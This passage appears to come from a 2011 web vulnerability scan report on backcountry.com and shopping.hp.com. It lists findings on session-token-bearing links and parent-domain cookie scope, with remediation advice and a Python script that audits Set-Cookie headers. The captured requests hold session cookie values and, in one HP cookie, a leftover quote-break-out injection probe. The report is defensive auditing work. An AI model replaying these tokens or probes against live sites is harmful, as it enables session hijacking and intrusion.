<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.6. http://www.backcountry.com/store/cart/add.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/cart/add.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; CART=; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713387819; __ar_v4=; c49=PDP%3ABackcountry.com%20Gift%20Certificate; s_sq=bcbackcountry%3D%2526pid%253DPDP%25253ABackcountry.com%252520Gift%252520Certificate%2526pidt%253D1%2526oid%253Dhttp%25253A//content.backcountry.com/images/bcs/product_detail/add_to_cart.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: evans
Content-Length: 29511
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT
Set-Cookie: CART=; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:53 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:53 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:11:53 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:11:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.7. http://www.backcountry.com/store/user.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/user.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /store/user.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; tr_template=; promo_nav=; s_cc=true; utag=session_id:1316711948944$_session:1316713441727; shipping_selection=FREE; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; siec=false; affiliate_reference_id=R999; c49=Step%202%20Place%20Your%20Order%20Error; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DStep%2525202%252520Place%252520Your%252520Order%252520Error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/store/user.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: arches
Content-Length: 33985
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:26 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.8. http://www.backcountry.com/womens-capri-pants

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /womens-capri-pants

Issue detail

The response contains the following link that appears to contain a session token: the LivePerson chat href in the <noscript> block quoted below. The href is the same static value seen in the other flagged backcountry.com responses and contains no per-visitor value; the match is on the literal parameter name SESSIONVAR!StaticButtonNameNoScript, so verify across unrelated sessions before treating this as a real token leak.

Request

GET /womens-capri-pants HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-clothing
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Moovweb-Pagetype: PRODUCT_GROUP
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: badlands
Content-Length: 162419
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.9. http://www.backcountry.com/womens-clothing

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /womens-clothing

Issue detail

The response contains the following link that appears to contain a session token: the LivePerson chat href in the <noscript> block quoted below. The href is the same static value seen in the other flagged backcountry.com responses and contains no per-visitor value; the match is on the literal parameter name SESSIONVAR!StaticButtonNameNoScript, so verify across unrelated sessions before treating this as a real token leak.

Request

GET /womens-clothing HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Moovweb-Pagetype: CATEGORY
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: harvard
Content-Length: 104245
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

3. Cookie scoped to parent domain
There are 19 instances of this issue:

Issue background

A cookie's Domain attribute determines which hosts receive the cookie. Browsers automatically send it with requests to every host in scope, and script running on any of those hosts can read it through document.cookie unless the cookie is also marked HttpOnly. If a cookie is scoped to a parent domain, it is sent to the parent domain and to every other subdomain of that parent. If the cookie holds sensitive data (such as a session token), that data becomes available to less trusted or less secure applications on those hosts, and a flaw in any one of them (for example an XSS bug on a sibling subdomain) can read the cookie, or set a cookie of the same name for the parent domain and so overwrite it, for the whole domain.

Issue remediation

Under RFC 6265, a cookie set without a Domain attribute is host-only: browsers return it only to the exact host that issued it and not to its subdomains (some older browsers also sent host-only cookies to subdomains, which is the behaviour the usual wording of this advice describes). Removing the explicit Domain attribute from the Set-Cookie header therefore gives the narrowest scope, which is safe and appropriate in most situations. A leading dot in a Domain value (domain=.hp.com, as in the HP instances below) is ignored by modern browsers and is equivalent to domain=hp.com. If you genuinely need a cookie to be accessible from a parent domain, review the security of every application hosted on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications. While reviewing these headers, note that none of the Set-Cookie headers quoted in 3.1 to 3.9 set the Secure or HttpOnly flags either; a session cookie scoped to a parent domain and lacking both is exposed to every subdomain, to plain-HTTP requests, and to script.
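The check the finding describes, written out as an added example (this is not the scanner's own code): parse each Set-Cookie header, apply the RFC 6265 rule that a missing Domain is host-only and a leading dot is ignored, and flag a cookie only when Domain names a proper parent of the issuing host. The sample headers are copied from responses 3.2 and 3.4 above; the session-name regex is an assumed heuristic, not the scanner's rule.

```python
"""Audit Set-Cookie headers for the 'cookie scoped to parent domain' condition.

Added example, not part of the scan report. A cookie is flagged when its Domain
attribute names a parent of the issuing host. Per RFC 6265 section 5.3 a cookie
with no Domain attribute is host-only (returned to the issuing host alone) and a
leading dot in Domain is ignored. SESSION_NAME_RE is a heuristic assumption.
"""
import re

# Heuristic: names that usually carry session state (assumption, not a standard).
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth", re.IGNORECASE)

# Set-Cookie values copied from responses 3.2 and 3.4 of this report.
BACKCOUNTRY_SET_COOKIES = [
    "MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:22 GMT",
    "RES_TRACKINGID=841292264887481; path=/; domain=backcountry.com; expires=Tue, 21-Sep-2021 22:11:21 GMT",
    "RES_SESSIONID=253168360320593; path=/; domain=backcountry.com; expires=Thu, 22-Sep-2011 12:41:21 GMT",
    "siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:22 GMT",
]
HP_SET_COOKIES = [
    "hpshopping=1&user_id=mlkrg9ye0A55NS%2FpuVTbcgSelmvi; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/",
    "hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/",
]


def parse_set_cookie(header):
    """Split a Set-Cookie value into (name, value, attributes).

    Attribute names are lower-cased; flag attributes (Secure, HttpOnly) map to ''.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def effective_domain(issuing_host, attrs):
    """Return (domain, host_only) as an RFC 6265 browser would store them."""
    domain = attrs.get("domain", "").lower().lstrip(".")
    if not domain:
        return issuing_host.lower(), True
    return domain, False


def is_parent_scoped(issuing_host, attrs):
    """True when Domain names a proper parent of the issuing host.

    A Domain equal to the host does not widen scope. A Domain that is not a
    suffix of the host on a label boundary would be rejected by the browser,
    so it is not flagged either.
    """
    host = issuing_host.lower()
    domain, host_only = effective_domain(host, attrs)
    if host_only or domain == host:
        return False
    return host.endswith("." + domain)


def audit(issuing_host, set_cookie_headers):
    """Return one finding per parent-scoped cookie, with the flags a reviewer wants."""
    findings = []
    for header in set_cookie_headers:
        name, _, attrs = parse_set_cookie(header)
        if not is_parent_scoped(issuing_host, attrs):
            continue
        domain, _ = effective_domain(issuing_host, attrs)
        findings.append({
            "cookie": name,
            "domain": domain,
            "session_like": bool(SESSION_NAME_RE.search(name)),
            "secure": "secure" in attrs,
            "httponly": "httponly" in attrs,
        })
    return findings


if __name__ == "__main__":
    for host, headers in (("www.backcountry.com", BACKCOUNTRY_SET_COOKIES),
                          ("www.shopping.hp.com", HP_SET_COOKIES)):
        for finding in audit(host, headers):
            print(host, finding)
```

Run against the sample headers, the backcountry.com response yields two findings (RES_TRACKINGID and RES_SESSIONID, the second session-like) and the HP response yields one (hpcompc_usen, scoped to hp.com, not session-like), matching the severities assigned in 3.2 and 3.4; MV_SESSION_ID and hpshopping have no Domain attribute and stay host-only.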


3.1. http://www.backcountry.com/store/BCS0021

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/BCS0021

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: RES_SESSIONID (domain=backcountry.com, set by www.backcountry.com). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/BCS0021 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mt.v=1.346469883.1316711542790; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; rdv_test_group=1; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; s_sq=%5B%5BB%5D%5D; utag=session_id:1316711948944$_session:1316713377068; c49=PDP%3ABackcountry.com%20Gift%20Certificate; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Location: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:39 GMT
Set-Cookie: RES_SESSIONID=256475435893179; path=/; domain=backcountry.com; expires=Thu, 22-Sep-2011 12:41:39 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:39 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:39 GMT


3.2. http://www.backcountry.com/store/PRA0870/Bliss-Capri-Pant-Womens.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/PRA0870/Bliss-Capri-Pant-Womens.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: RES_TRACKINGID and RES_SESSIONID (both domain=backcountry.com, set by www.backcountry.com). RES_SESSIONID appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/PRA0870/Bliss-Capri-Pant-Womens.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-capri-pants
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1; __utmx=248652180.; __utmxx=248652180.

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Location: http://www.backcountry.com/prana-bliss-capri-pant-womens
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:22 GMT
Set-Cookie: RES_TRACKINGID=841292264887481; path=/; domain=backcountry.com; expires=Tue, 21-Sep-2021 22:11:21 GMT
Set-Cookie: RES_SESSIONID=253168360320593; path=/; domain=backcountry.com; expires=Thu, 22-Sep-2011 12:41:21 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:22 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:22 GMT


3.3. http://www.shopping.hp.com/design

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (domain=.hp.com, set by www.shopping.hp.com, so it is sent to and readable from every host under hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessories HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:38 GMT; path=/
